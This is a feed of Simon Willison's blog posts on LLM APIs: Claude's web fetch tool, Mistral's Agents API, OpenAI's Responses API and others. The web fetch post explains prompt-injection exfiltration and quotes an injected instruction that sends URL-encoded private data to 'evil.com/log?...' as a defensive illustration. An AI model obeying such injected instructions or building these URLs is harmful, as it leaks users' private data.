<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: apis</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/apis.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-05T00:32:11+00:00</updated><author><name>Simon Willison</name></author><entry><title>research-llm-apis 2026-04-04</title><link href="https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag" rel="alternate"/><published>2026-04-05T00:32:11+00:00</published><updated>2026-04-05T00:32:11+00:00</updated><id>https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;strong&gt;Release:&lt;/strong&gt; &lt;a href="https://github.com/simonw/research-llm-apis/releases/tag/2026-04-04"&gt;research-llm-apis 2026-04-04&lt;/a&gt;&lt;/p&gt;
    &lt;p&gt;I'm working on a &lt;a href="https://github.com/simonw/llm/issues/1314"&gt;major change&lt;/a&gt; to my LLM Python library and CLI tool. LLM provides an abstraction layer over hundreds of different LLMs from dozens of different vendors thanks to its plugin system, and some of those vendors have grown new features over the past year which LLM's abstraction layer can't handle, such as server-side tool execution.&lt;/p&gt;
&lt;p&gt;To help design that new abstraction layer I had Claude Code read through the Python client libraries for Anthropic, OpenAI, Gemini and Mistral and use those to help craft &lt;code&gt;curl&lt;/code&gt; commands to access the raw JSON for both streaming and non-streaming modes across a range of different scenarios. Both the scripts and the captured outputs now live in this new repo.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="json"/><category term="llms"/><category term="llm"/></entry><entry><title>Quoting Steve Krouse</title><link href="https://simonwillison.net/2025/Nov/12/steve-krouse/#atom-tag" rel="alternate"/><published>2025-11-12T17:21:19+00:00</published><updated>2025-11-12T17:21:19+00:00</updated><id>https://simonwillison.net/2025/Nov/12/steve-krouse/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://x.com/stevekrouse/status/1988641250329989533"&gt;&lt;p&gt;The fact that MCP is a difference surface from your normal API allows you to ship MUCH faster to MCP. This has been unlocked by inference at runtime&lt;/p&gt;
&lt;p&gt;Normal APIs are promises to developers, because developer commit code that relies on those APIs, and then walk away. If you break the API, you break the promise, and you break that code. This means a developer gets woken up at 2am to fix the code&lt;/p&gt;
&lt;p&gt;But MCP servers are called by LLMs which dynamically read the spec every time, which allow us to constantly change the MCP server. It doesn't matter! We haven't made any promises. The LLM can figure it out afresh every time&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://x.com/stevekrouse/status/1988641250329989533"&gt;Steve Krouse&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/steve-krouse"&gt;steve-krouse&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/model-context-protocol"&gt;model-context-protocol&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="steve-krouse"/><category term="model-context-protocol"/></entry><entry><title>Claude API: Web fetch tool</title><link href="https://simonwillison.net/2025/Sep/10/claude-web-fetch-tool/#atom-tag" rel="alternate"/><published>2025-09-10T17:24:51+00:00</published><updated>2025-09-10T17:24:51+00:00</updated><id>https://simonwillison.net/2025/Sep/10/claude-web-fetch-tool/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://docs.anthropic.com/en/docs/agents-and-tools/tool-use/web-fetch-tool"&gt;Claude API: Web fetch tool&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
New in the Claude API: if you pass the &lt;code&gt;web-fetch-2025-09-10&lt;/code&gt; beta header you can add &lt;code&gt;{"type": "web_fetch_20250910",  "name": "web_fetch", "max_uses": 5}&lt;/code&gt; to your &lt;code&gt;"tools"&lt;/code&gt; list and Claude will gain the ability to fetch content from URLs as part of responding to your prompt.&lt;/p&gt;
&lt;p&gt;It extracts the "full text content" from the URL, and extracts text content from PDFs as well.&lt;/p&gt;
&lt;p&gt;What's particularly interesting here is their approach to safety for this feature:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Enabling the web fetch tool in environments where Claude processes untrusted input alongside sensitive data poses data exfiltration risks. We recommend only using this tool in trusted environments or when handling non-sensitive data.&lt;/p&gt;
&lt;p&gt;To minimize exfiltration risks, Claude is not allowed to dynamically construct URLs. Claude can only fetch URLs that have been explicitly provided by the user or that come from previous web search or web fetch results. However, there is still residual risk that should be carefully considered when using this tool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My first impression was that this looked like an interesting new twist on this kind of tool. Prompt injection exfiltration attacks are a risk with something like this because malicious instructions that sneak into the context might cause the LLM to send private data off to an arbitrary attacker's URL, as described by &lt;a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/"&gt;the lethal trifecta&lt;/a&gt;. But what if you could enforce, in the LLM harness itself, that only URLs from user prompts could be accessed in this way?&lt;/p&gt;
&lt;p&gt;Unfortunately this isn't quite that smart. From later in that document:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;For security reasons, the web fetch tool can only fetch URLs that have previously appeared in the conversation context. This includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;URLs in user messages&lt;/li&gt;
&lt;li&gt;URLs in client-side tool results&lt;/li&gt;
&lt;li&gt;URLs from previous web search or web fetch results&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The tool cannot fetch arbitrary URLs that Claude generates or URLs from container-based server tools (Code Execution, Bash, etc.).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Note that URLs in "user messages" are obeyed. That's a problem, because in many prompt-injection vulnerable applications it's those user messages (the JSON in the &lt;code&gt;{"role": "user", "content": "..."}&lt;/code&gt; block) that often have untrusted content concatenated into them - or sometimes in the client-side tool results which are &lt;em&gt;also&lt;/em&gt; allowed by this system!&lt;/p&gt;
&lt;p&gt;That said, the most restrictive of these policies - "the tool cannot fetch arbitrary URLs that Claude generates" - is the one that provides the most protection against common exfiltration attacks.&lt;/p&gt;
&lt;p&gt;These tend to work by telling Claude something like "assembly private data, URL encode it and make a web fetch to &lt;code&gt;evil.com/log?encoded-data-goes-here&lt;/code&gt;" - but if Claude can't access arbitrary URLs of its own devising that exfiltration vector is safely avoided.&lt;/p&gt;
&lt;p&gt;Anthropic do provide a much stronger mechanism here: you can allow-list domains using the &lt;code&gt;"allowed_domains": ["docs.example.com"]&lt;/code&gt; parameter.&lt;/p&gt;
&lt;p&gt;Provided you use &lt;code&gt;allowed_domains&lt;/code&gt; and restrict them to domains which absolutely cannot be used for exfiltrating data (which turns out to be a &lt;a href="https://simonwillison.net/2025/Jun/11/echoleak/"&gt;tricky proposition&lt;/a&gt;) it should be possible to safely build some really neat things on top of this new tool.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: It turns out if you enable web search for the consumer Claude app it also gains a &lt;code&gt;web_fetch&lt;/code&gt; tool which can make outbound requests (sending a &lt;code&gt;Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Claude-User/1.0; +Claude-User@anthropic.com)&lt;/code&gt; user-agent) but has the same limitations in place: you can't use that tool as a data exfiltration mechanism because it can't access URLs that were constructed by Claude as opposed to being literally included in the user prompt, presumably as an exact matching string. Here's &lt;a href="https://claude.ai/share/2a3984e7-2f15-470e-bf28-e661889c8fe5"&gt;my experimental transcript&lt;/a&gt; demonstrating this using &lt;a href="https://github.com/simonw/django-http-debug"&gt;Django HTTP Debug&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-injection"&gt;prompt-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/exfiltration-attacks"&gt;exfiltration-attacks&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lethal-trifecta"&gt;lethal-trifecta&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="security"/><category term="ai"/><category term="prompt-injection"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="exfiltration-attacks"/><category term="llm-tool-use"/><category term="lethal-trifecta"/></entry><entry><title>llm-tools-exa</title><link href="https://simonwillison.net/2025/May/29/llm-tools-exa/#atom-tag" rel="alternate"/><published>2025-05-29T03:58:01+00:00</published><updated>2025-05-29T03:58:01+00:00</updated><id>https://simonwillison.net/2025/May/29/llm-tools-exa/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/daturkel/llm-tools-exa"&gt;llm-tools-exa&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
When I &lt;a href="https://simonwillison.net/2025/May/27/llm-tools/"&gt;shipped LLM 0.26&lt;/a&gt; yesterday one of the things I was most excited about was seeing what new tool plugins people would build for it.&lt;/p&gt;
&lt;p&gt;Dan Turkel's &lt;a href="https://github.com/daturkel/llm-tools-exa"&gt;llm-tools-exa&lt;/a&gt; is one of the first. It adds web search to LLM using &lt;a href="https://exa.ai/"&gt;Exa&lt;/a&gt; (&lt;a href="https://simonwillison.net/2025/Mar/10/llm-openrouter-04/"&gt;previously&lt;/a&gt;), a relatively new search engine offering that rare thing, an API for search. They have a free preview, you can &lt;a href="https://dashboard.exa.ai/api-keys"&gt;grab an API key here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I'm getting pretty great results! I tried it out like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-tools-exa
llm keys set exa
# Pasted API key here

llm -T web_search "What's in LLM 0.26?"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's &lt;a href="https://gist.github.com/simonw/b5780859f1dc68695fef496f44780595#response-1"&gt;the full answer&lt;/a&gt; - it started like this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;LLM 0.26 was released on May 27, 2025, and the biggest new feature in this version is official support for tools. Here's a summary of what's new and notable in LLM 0.26:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LLM can now run tools. You can grant LLMs from OpenAI, Anthropic, Gemini, and local models access to any tool you represent as a Python function.&lt;/li&gt;
&lt;li&gt;Tool plugins are introduced, allowing installation of plugins that add new capabilities to any model you use.&lt;/li&gt;
&lt;li&gt;Tools can be installed from plugins and loaded by name with the --tool/-T option.
[...]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Exa provided 21,000 tokens of search results, including what looks to be a full copy of my blog entry and the release notes for LLM.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/search"&gt;search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="search"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="llm"/><category term="llm-tool-use"/></entry><entry><title>Build AI agents with the Mistral Agents API</title><link href="https://simonwillison.net/2025/May/27/mistral-agents-api/#atom-tag" rel="alternate"/><published>2025-05-27T14:48:03+00:00</published><updated>2025-05-27T14:48:03+00:00</updated><id>https://simonwillison.net/2025/May/27/mistral-agents-api/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mistral.ai/news/agents-api"&gt;Build AI agents with the Mistral Agents API&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Big upgrade to Mistral's API this morning: they've announced a new "Agents API". Mistral have been using the term "agents" for a while now. Here's &lt;a href="https://docs.mistral.ai/capabilities/agents/"&gt;how they describe them&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AI agents are autonomous systems powered by large language models (LLMs) that, given high-level instructions, can plan, use tools, carry out steps of processing, and take actions to achieve specific goals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What that actually means is a system prompt plus a bundle of tools running in a loop.&lt;/p&gt;
&lt;p&gt;Their new API looks similar to OpenAI's &lt;a href="https://simonwillison.net/2025/Mar/11/responses-vs-chat-completions/"&gt;Responses API&lt;/a&gt; (March 2025), in that it now &lt;a href="https://docs.mistral.ai/agents/agents_basics/#conversations"&gt;manages conversation state&lt;/a&gt; server-side for you, allowing you to send new messages to a thread without having to maintain that local conversation history yourself and transfer it every time.&lt;/p&gt;
&lt;p&gt;Mistral's announcement captures the essential features that all of the LLM vendors have started to converge on for these "agentic" systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Code execution&lt;/strong&gt;, using Mistral's new &lt;a href="https://docs.mistral.ai/agents/connectors/code_interpreter/"&gt;Code Interpreter&lt;/a&gt; mechanism. It's Python in a server-side sandbox - OpenAI have had this for years and Anthropic &lt;a href="https://docs.anthropic.com/en/docs/agents-and-tools/tool-use/code-execution-tool"&gt;launched theirs&lt;/a&gt; last week.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Image generation&lt;/strong&gt; - Mistral are using &lt;a href="https://docs.mistral.ai/agents/connectors/image_generation/"&gt;Black Forest Lab FLUX1.1 [pro] Ultra&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Web search&lt;/strong&gt; - this is an interesting variant, Mistral &lt;a href="https://docs.mistral.ai/agents/connectors/websearch/"&gt;offer two versions&lt;/a&gt;: &lt;code&gt;web_search&lt;/code&gt; is classic search, but &lt;code&gt;web_search_premium&lt;/code&gt; "enables access to both a search engine and two news agencies: AFP and AP". Mistral don't mention which underlying search engine they use but Brave is the only search vendor listed &lt;a href="https://trust.mistral.ai/subprocessors/"&gt;in the subprocessors on their Trust Center&lt;/a&gt; so I'm assuming it's Brave Search. I wonder if that news agency integration is handled by Brave or Mistral themselves?&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Document library&lt;/strong&gt; is Mistral's version of &lt;a href="https://docs.mistral.ai/agents/connectors/document_library/"&gt;hosted RAG&lt;/a&gt; over "user-uploaded documents". Their documentation doesn't mention if it's vector-based or FTS or which embedding model it uses, which is a disappointing omission.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Context Protocol&lt;/strong&gt; support: you can now include details of MCP servers in your API calls and Mistral will call them when it needs to. It's pretty amazing to see the same new feature roll out across OpenAI (&lt;a href="https://openai.com/index/new-tools-and-features-in-the-responses-api/"&gt;May 21st&lt;/a&gt;), Anthropic (&lt;a href="https://simonwillison.net/2025/May/22/code-with-claude-live-blog/"&gt;May 22nd&lt;/a&gt;) and now Mistral (&lt;a href="https://mistral.ai/news/agents-api"&gt;May 27th&lt;/a&gt;) within eight days of each other!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;They also implement "&lt;a href="https://docs.mistral.ai/agents/handoffs/#create-an-agentic-workflow"&gt;agent handoffs&lt;/a&gt;":&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Once agents are created, define which agents can hand off tasks to others. For example, a finance agent might delegate tasks to a web search agent or a calculator agent based on the conversation's needs.&lt;/p&gt;
&lt;p&gt;Handoffs enable a seamless chain of actions. A single request can trigger tasks across multiple agents, each handling specific parts of the request. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This pattern always sounds impressive on paper but I'm yet to be convinced that it's worth using frequently. OpenAI have a similar mechanism &lt;a href="https://simonwillison.net/2025/Mar/11/openai-agents-sdk/"&gt;in their OpenAI Agents SDK&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sandboxing"&gt;sandboxing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mistral"&gt;mistral&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-agents"&gt;ai-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/model-context-protocol"&gt;model-context-protocol&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agent-definitions"&gt;agent-definitions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/brave"&gt;brave&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="python"/><category term="sandboxing"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="mistral"/><category term="llm-tool-use"/><category term="ai-agents"/><category term="model-context-protocol"/><category term="agent-definitions"/><category term="brave"/></entry><entry><title>OpenAI: Introducing our latest image generation model in the API</title><link href="https://simonwillison.net/2025/Apr/24/openai-images-api/#atom-tag" rel="alternate"/><published>2025-04-24T19:04:43+00:00</published><updated>2025-04-24T19:04:43+00:00</updated><id>https://simonwillison.net/2025/Apr/24/openai-images-api/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://openai.com/index/image-generation-api/"&gt;OpenAI: Introducing our latest image generation model in the API&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The &lt;a href="https://simonwillison.net/2025/Mar/25/introducing-4o-image-generation/"&gt;astonishing native image generation capability&lt;/a&gt; of GPT-4o - a feature which continues to not have an obvious name - is now available via OpenAI's API.&lt;/p&gt;
&lt;p&gt;It's quite expensive. OpenAI's &lt;a href="https://openai.com/api/pricing/"&gt;estimates&lt;/a&gt; are:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Image outputs cost approximately $0.01 (low), $0.04 (medium), and $0.17 (high) for square images&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Since this is a true multi-modal model capability - the images are created using a GPT-4o variant, which can now output text, audio and images - I had expected this to come as part of their chat completions or responses API. Instead, they've chosen to add it to the existing &lt;code&gt;/v1/images/generations&lt;/code&gt; API, previously used for DALL-E.&lt;/p&gt;
&lt;p&gt;They gave it the terrible name &lt;strong&gt;gpt-image-1&lt;/strong&gt; - no hint of the underlying GPT-4o in that name at all.&lt;/p&gt;
&lt;p&gt;I'm contemplating adding support for it as a custom LLM subcommand via my &lt;a href="https://github.com/simonw/llm-openai-plugin"&gt;llm-openai plugin&lt;/a&gt;, see &lt;a href="https://github.com/simonw/llm-openai-plugin/issues/18"&gt;issue #18&lt;/a&gt; in that repo.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/text-to-image"&gt;text-to-image&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="text-to-image"/></entry><entry><title>Note on 10th April 2025</title><link href="https://simonwillison.net/2025/Apr/10/bullets/#atom-tag" rel="alternate"/><published>2025-04-10T14:27:08+00:00</published><updated>2025-04-10T14:27:08+00:00</updated><id>https://simonwillison.net/2025/Apr/10/bullets/#atom-tag</id><summary type="html">
    &lt;p&gt;These proposed API integrations where your LLM agent talks to someone else's LLM tool-using agent are the API version of that thing where someone uses ChatGPT to turn their bullets into an email and the recipient uses ChatGPT to summarize it back to bullet points.&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-agents"&gt;ai-agents&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="ai"/><category term="llms"/><category term="ai-agents"/></entry><entry><title>OpenAI API: Responses vs. Chat Completions</title><link href="https://simonwillison.net/2025/Mar/11/responses-vs-chat-completions/#atom-tag" rel="alternate"/><published>2025-03-11T21:47:54+00:00</published><updated>2025-03-11T21:47:54+00:00</updated><id>https://simonwillison.net/2025/Mar/11/responses-vs-chat-completions/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://platform.openai.com/docs/guides/responses-vs-chat-completions"&gt;OpenAI API: Responses vs. Chat Completions&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
OpenAI released a bunch of new API platform features this morning under the headline "&lt;a href="https://openai.com/index/new-tools-for-building-agents/"&gt;New tools for building agents&lt;/a&gt;" (their somewhat mushy interpretation of "agents" here is "systems that independently accomplish tasks on behalf of users").&lt;/p&gt;
&lt;p&gt;A particularly significant change is the introduction of a new &lt;strong&gt;Responses API&lt;/strong&gt;, which is a slightly different shape from the Chat Completions API that they've offered for the past couple of years and which others in the industry have widely cloned as an ad-hoc standard.&lt;/p&gt;
&lt;p&gt;In &lt;a href="https://platform.openai.com/docs/guides/responses-vs-chat-completions"&gt;this guide&lt;/a&gt; they illustrate the differences, with a reassuring note that:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Chat Completions API is an industry standard for building AI applications, and we intend to continue supporting this API indefinitely. We're introducing the Responses API to simplify workflows involving tool use, code execution, and state management. We believe this new API primitive will allow us to more effectively enhance the OpenAI platform into the future.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An API that &lt;em&gt;is&lt;/em&gt; going away is the &lt;a href="https://platform.openai.com/docs/api-reference/assistants"&gt;Assistants API&lt;/a&gt;, a perpetual beta first launched at OpenAI DevDay in 2023. The new responses API solves effectively the same problems but better, and assistants will be sunset "in the first half of 2026".&lt;/p&gt;
&lt;p&gt;The best illustration I've seen of the differences between the two is this &lt;a href="https://github.com/openai/openai-python/commit/2954945ecc185259cfd7cd33c8cbc818a88e4e1b"&gt;giant commit&lt;/a&gt; to the &lt;code&gt;openai-python&lt;/code&gt; GitHub repository updating ALL of the example code in one go.&lt;/p&gt;
&lt;p&gt;The most important feature of the Responses API (a feature it shares with the old Assistants API) is that it can manage conversation state on the server for you. An oddity of the Chat Completions API is that you need to maintain your own records of the current conversation, sending back full copies of it with each new prompt. You end up making API calls that look like this (from &lt;a href="https://platform.openai.com/docs/guides/conversation-state?api-mode=chat&amp;amp;lang=javascript#manually-manage-conversation-state"&gt;their examples&lt;/a&gt;):&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
    &lt;span class="pl-ent"&gt;"model"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;gpt-4o-mini&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-ent"&gt;"messages"&lt;/span&gt;: [
        {
            &lt;span class="pl-ent"&gt;"role"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;user&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
            &lt;span class="pl-ent"&gt;"content"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;knock knock.&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
        },
        {
            &lt;span class="pl-ent"&gt;"role"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;assistant&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
            &lt;span class="pl-ent"&gt;"content"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Who's there?&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
        },
        {
            &lt;span class="pl-ent"&gt;"role"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;user&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
            &lt;span class="pl-ent"&gt;"content"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Orange.&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
        }
    ]
}&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;These can get long and unwieldy - especially when attachments such as images are involved - but the real challenge is when you start integrating tools: in a conversation with tool use you'll need to maintain that full state &lt;em&gt;and&lt;/em&gt; drop messages in that show the output of the tools the model requested. It's not a trivial thing to work with.&lt;/p&gt;
&lt;p&gt;The new Responses API continues to support this list of messages format, but you also get the option to outsource that to OpenAI entirely: you can add a new &lt;code&gt;"store": true&lt;/code&gt; property and then in subsequent messages include a &lt;code&gt;"previous_response_id: response_id&lt;/code&gt; key to continue that conversation.&lt;/p&gt;
&lt;p&gt;This feels a whole lot more natural than the Assistants API, which required you to think in terms of &lt;a href="https://platform.openai.com/docs/assistants/overview#objects"&gt;threads, messages and runs&lt;/a&gt; to achieve the same effect.&lt;/p&gt;
&lt;p&gt;Also fun: the Response API &lt;a href="https://twitter.com/athyuttamre/status/1899541484308971822"&gt;supports HTML form encoding&lt;/a&gt; now in addition to JSON:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl https://api.openai.com/v1/responses \
  -u :$OPENAI_API_KEY \
  -d model="gpt-4o" \
  -d input="What is the capital of France?"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found that in an excellent &lt;a href="https://twitter.com/athyuttamre/status/1899541471532867821"&gt;Twitter thread&lt;/a&gt; providing background on the design decisions in the new API from OpenAI's Atty Eleti. Here's &lt;a href="https://nitter.net/athyuttamre/status/1899541471532867821"&gt;a nitter link&lt;/a&gt; for people who don't have a Twitter account.&lt;/p&gt;
&lt;h4&gt;New built-in tools&lt;/h4&gt;
&lt;p&gt;A potentially more exciting change today is the introduction of default tools that you can request while using the new Responses API. There are three of these, all of which can be specified in the &lt;code&gt;"tools": [...]&lt;/code&gt; array.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{"type": "web_search_preview"}&lt;/code&gt; - the same search feature available through ChatGPT. The documentation doesn't clarify which underlying search engine is used - I initially assumed Bing, but the tool documentation links to this &lt;a href="https://platform.openai.com/docs/bots"&gt;Overview of OpenAI Crawlers&lt;/a&gt; page so maybe it's entirely in-house now? Web search &lt;a href="https://platform.openai.com/docs/pricing#web-search"&gt;is priced&lt;/a&gt; at between $25 and $50 per thousand queries depending on if you're using GPT-4o or GPT-4o mini and the configurable size of your "search context".&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{"type": "file_search", "vector_store_ids": [...]}&lt;/code&gt; provides integration with the latest version of their &lt;a href="https://platform.openai.com/docs/guides/tools-file-search"&gt;file search&lt;/a&gt; vector store, mainly used for RAG. "Usage is priced⁠ at $2.50 per thousand queries and file storage at $0.10/GB/day, with the first GB free".&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{"type": "computer_use_preview", "display_width": 1024, "display_height": 768, "environment": "browser"}&lt;/code&gt; is the most surprising to me: it's tool access to the &lt;a href="https://openai.com/index/computer-using-agent/"&gt;Computer-Using Agent&lt;/a&gt; system they built for their Operator product. This one is going to be &lt;em&gt;a lot&lt;/em&gt; of fun to explore. The tool's documentation includes a warning &lt;a href="https://platform.openai.com/docs/guides/tools-computer-use#beware-of-prompt-injections"&gt;about prompt injection risks&lt;/a&gt;. Though on closer inspection I think this may work more like &lt;a href="https://simonwillison.net/2024/Oct/22/computer-use/"&gt;Claude Computer Use&lt;/a&gt;, where you have to &lt;a href="https://platform.openai.com/docs/guides/tools-computer-use#setting-up-your-environment"&gt;run the sandboxed environment yourself&lt;/a&gt; rather than outsource that difficult part to them.&lt;/li&gt;
